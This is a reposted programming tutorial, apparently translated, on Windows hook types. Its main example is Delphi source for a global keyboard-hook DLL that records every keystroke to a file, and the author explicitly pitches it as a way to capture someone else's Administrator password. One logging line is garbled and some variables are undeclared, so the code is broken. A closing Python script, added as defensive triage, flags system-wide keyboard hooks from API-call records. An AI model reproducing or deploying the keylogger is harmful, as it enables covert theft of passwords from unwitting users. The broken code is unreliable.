Using hooks to monitor Windows

xiaoxiao2021-03-06  38

Every program has its own living space. In Windows you can perform operations at any time, and each operation can trigger a message. These messages fall into three groups. The first comes from operating your own program's interface (OnClick, OnMouseMove and so on). For the second, you can use the Windows message mechanism to capture some system messages. But if you want to monitor any program at any time, you will probably choose a hook. There are other methods, but it has to be acknowledged that a hook is one way to solve the problem.

Windows provides the hook mechanism, defined as: "A callback function provided by an application that receives certain data before the normal recipient of the data. The hook function can thus examine or modify the data before passing it on." Hooks can be used in many ways. Some common hook types are listed here:

CALLWNDPROC, CALLWNDPROCRET: The WH_CALLWNDPROC and WH_CALLWNDPROCRET hooks enable you to monitor messages sent to window procedures by the SendMessage function. Windows calls a WH_CALLWNDPROC hook procedure before passing the message to the receiving window procedure, and calls the WH_CALLWNDPROCRET hook procedure after the window procedure has processed the message.

CBT: Windows calls a WH_CBT hook procedure before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the input focus; or before synchronizing with the system message queue. The value the hook procedure returns determines whether Windows allows or prevents one of these operations. The WH_CBT hook is intended primarily for computer-based training (CBT) applications.

KEYBOARD: The WH_KEYBOARD hook enables an application to monitor message traffic for WM_KEYDOWN and WM_KEYUP messages about to be returned by the GetMessage or PeekMessage function. You can use the WH_KEYBOARD hook to monitor keyboard input posted to a message queue.

Here is an example (debugged with Delphi 7.0). Suppose you need access to a person's machine, and that person types his Administrator password on your machine. Of course, you could also use hacker tools to get his password, but why not try writing a program that records all keyboard operations?

First, note that a hook differs from an ordinary application: it has to live in a global DLL, otherwise your program cannot capture information outside itself. (Of course you can use Windows messages, but that is not discussed here.)

Write a DLL that defines the following functions:

    function setkeyhook: bool; export;
    function endkeyhook: bool; export;
    procedure keyhookexit; far;
    procedure SetMainHandle(Handle: HWND); export; forward;
    function keyboardhookhandler(icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export;

    procedure EntryPointProc(reason: Integer);
    const
      hMapObject: THandle = 0;
    begin
      case reason of
        DLL_PROCESS_ATTACH:
          begin
            hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), '_CBT');
            rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
          end;
        DLL_PROCESS_DETACH:
          begin
            try
              UnMapViewOfFile(rHookRec);
              CloseHandle(hMapObject);
            except
            end;
          end;
      end;
    end;

    procedure keyhookexit; far;
    begin
      if hNexthookproc <> 0 then
        endkeyhook;
      exitproc := procsaveexit;
    end;

    function endkeyhook: bool; export;
    begin
      if hNexthookproc <> 0 then
      begin
        UnhookWindowsHookEx(hNexthookproc);
        hNexthookproc := 0;
        MessageBeep(0);
      end;
      result := hNexthookproc = 0;
      MainHandle := 0;
    end;

    function Setkeyhook: bool; export;
    begin
      // Thread id 0: the hook is installed for every thread on the desktop
      hNexthookproc := SetWindowsHookEx(WH_KEYBOARD, keyboardhookhandler, hInstance, 0);
      result := hNexthookproc <> 0;
    end;

    function keyboardhookhandler(icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export;
    var
      s: TStringList;
    begin
      if icode < 0 then
      begin
        result := CallNextHookEx(hNexthookproc, icode, wparam, lparam);
        exit;
      end;
      // Bit 31 of lparam set (negative value): the key is being released
      if lparam < 0 then
      begin
        exit;
      end;
      s := TStringList.Create;
      if FileExists(AFileName) then
        s.LoadFromFile(AFileName);
      // Save the keyboard characters to the file
      S.Add ('YYYMMDD HH: NN: SS: ZZ:', NOW) Char (WPARAM));
      s.SaveToFile(AFileName);
      s.Free;
      result := 0;
    end;

The DLL's project file defines the exports as follows:

    exports
      SetKeyhook index 1,
      EndKeyHook index 2,
      SetMainHandle index 3;
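From the monitoring side, the call that installs this DLL's hook, SetWindowsHookEx with WH_KEYBOARD and a thread id of 0, is the event worth alerting on. The following is an added example, not part of the original article: it triages API-call records in a constructed key=value format (the field names, image names and SAMPLE lines are assumptions) and flags system-wide keyboard hooks.

```python
# Added example. The record format and the SAMPLE lines are constructed.
# Hook type values are the WH_* constants from winuser.h.
HOOK_NAMES = {2: "WH_KEYBOARD", 4: "WH_CALLWNDPROC", 5: "WH_CBT",
              12: "WH_CALLWNDPROCRET", 13: "WH_KEYBOARD_LL"}
KEYBOARD_HOOKS = {2, 13}

def parse_event(line):
    """Parse one 'key=value key=value ...' record into a dict."""
    return dict(tok.split("=", 1) for tok in line.split())

def classify(event):
    """Return (hook name, scope, verdict) for one SetWindowsHookEx record."""
    hook_id = int(event["idHook"], 0)
    thread_id = int(event["dwThreadId"], 0)
    name = HOOK_NAMES.get(hook_id, "hook_%d" % hook_id)
    # dwThreadId = 0 asks for a hook on every thread of the desktop.
    scope = "global" if thread_id == 0 else "thread"
    if hook_id in KEYBOARD_HOOKS and scope == "global":
        verdict = "alert"    # sees keystrokes typed into other programs
    elif scope == "global":
        verdict = "review"   # system-wide, but not a keyboard hook
    else:
        verdict = "info"     # limited to one thread
    return name, scope, verdict

def triage(lines, allowlist=()):
    """Return (image, hook, scope, verdict) per hook installation seen."""
    allowed = {name.lower() for name in allowlist}
    findings = []
    for line in lines:
        event = parse_event(line)
        if event.get("api") != "SetWindowsHookEx":
            continue
        if event["image"].lower() in allowed:
            continue
        findings.append((event["image"],) + classify(event))
    return findings

SAMPLE = [  # constructed records
    "api=SetWindowsHookEx image=sample_host.exe idHook=2 hMod=0x10000000 dwThreadId=0",
    "api=CreateFileMapping image=sample_host.exe name=_CBT",
    "api=SetWindowsHookEx image=trainer.exe idHook=5 hMod=0x10000000 dwThreadId=0",
    "api=SetWindowsHookEx image=editor.exe idHook=2 hMod=0x0 dwThreadId=4312",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(*finding)
```

The allowlist argument takes image names of software known to install global hooks legitimately, so that only unexpected installers remain in the findings.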

Please cite the original address when reposting: https://www.9cbs.com/read-62210.html
